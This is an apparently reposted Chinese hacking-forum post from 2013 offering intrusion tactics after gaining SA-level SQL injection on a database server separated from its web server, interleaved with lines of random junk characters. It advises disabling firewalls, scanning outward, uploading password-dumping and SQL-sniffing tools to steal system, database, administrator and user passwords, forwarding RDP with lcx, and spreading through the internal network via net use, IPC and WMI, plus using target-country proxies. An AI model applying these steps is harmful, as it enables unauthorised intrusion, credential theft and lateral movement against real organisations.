当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。
a1 m$ A# h- N4 o! t6 k9 Y: R( }* W+ m3 {5 { B
3 D7 ?1 k9 W) S" X) z
( c" @' r1 j1 O# R! n2 r; _
SA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出)5 S5 P' s7 k+ x9 x6 _. c- b/ D0 |9 G$ B
, C. @( U% A m2 V% V H9 x8 P- Y$ a& M8 m" b9 _8 ]: h
一、DB机有公网IP.
$ ~. a2 y& |9 [, O' U+ K( R, E" Q5 E& o
1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.
: `# p$ S) B: U4 x
) g2 D& R8 a# A# w/ [; c9 ?
* `8 \3 g+ S- f8 d+ _8 L2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389.$ N/ x9 t7 T1 q9 C9 p: b
: g; d9 U- }7 Y- k3 \( P& {
; y& M3 n# c, w6 ~7 ?3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com
! w! b9 u1 G7 g4 f
8 c/ d& t) N" ~- o0 S% P4 M1 j% ?
3 R3 _5 I2 P6 [; }. Y4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用.5 n8 y) a# g/ F3 Q' u8 f; b; U: Q9 b5 ]
- I7 n9 V. F2 e# g+ @4 T
: H" P2 ?4 V a+ W/ ~4 ~7 c7 C
0 i6 M- }& f8 n# H
二、DB机只有内网IP& J* h* [1 O0 ^2 Y. n& d. h
! q. r5 ^3 m* l' |, @1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等.
$ B7 L7 n6 y# \( m8 J0 X! B; o2 t- g, k9 Y. Z' F' e( f* P6 r. B: n
' H4 o( ]0 ?2 x( k2:停掉防火墙和IP策略再从内往外扫描.5 h& i6 b+ k5 o6 {+ F
& M) q3 Z6 B, ?6 @* H& C$ D( o C4 i4 d- h3 r+ k
3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的.
3 ?$ T2 f/ k3 `5 O9 S6 T
! X& }- u4 A* S" ~& {
7 c- X7 B e8 T' j/ L4:学会密码规律分析往往会有惊喜.) U- K$ }2 [9 s3 x! {8 i1 @3 w
6 e2 z4 N8 K' \ S' }
# G: \* d1 X: S4 e
5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等
1 v1 |! b$ T/ w5 _; F& g
, }' j$ a, z$ ]) P& S1 y8 v) L( [
有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的 |
发表于 2013-2-16 21:46:01
收藏
支持
反对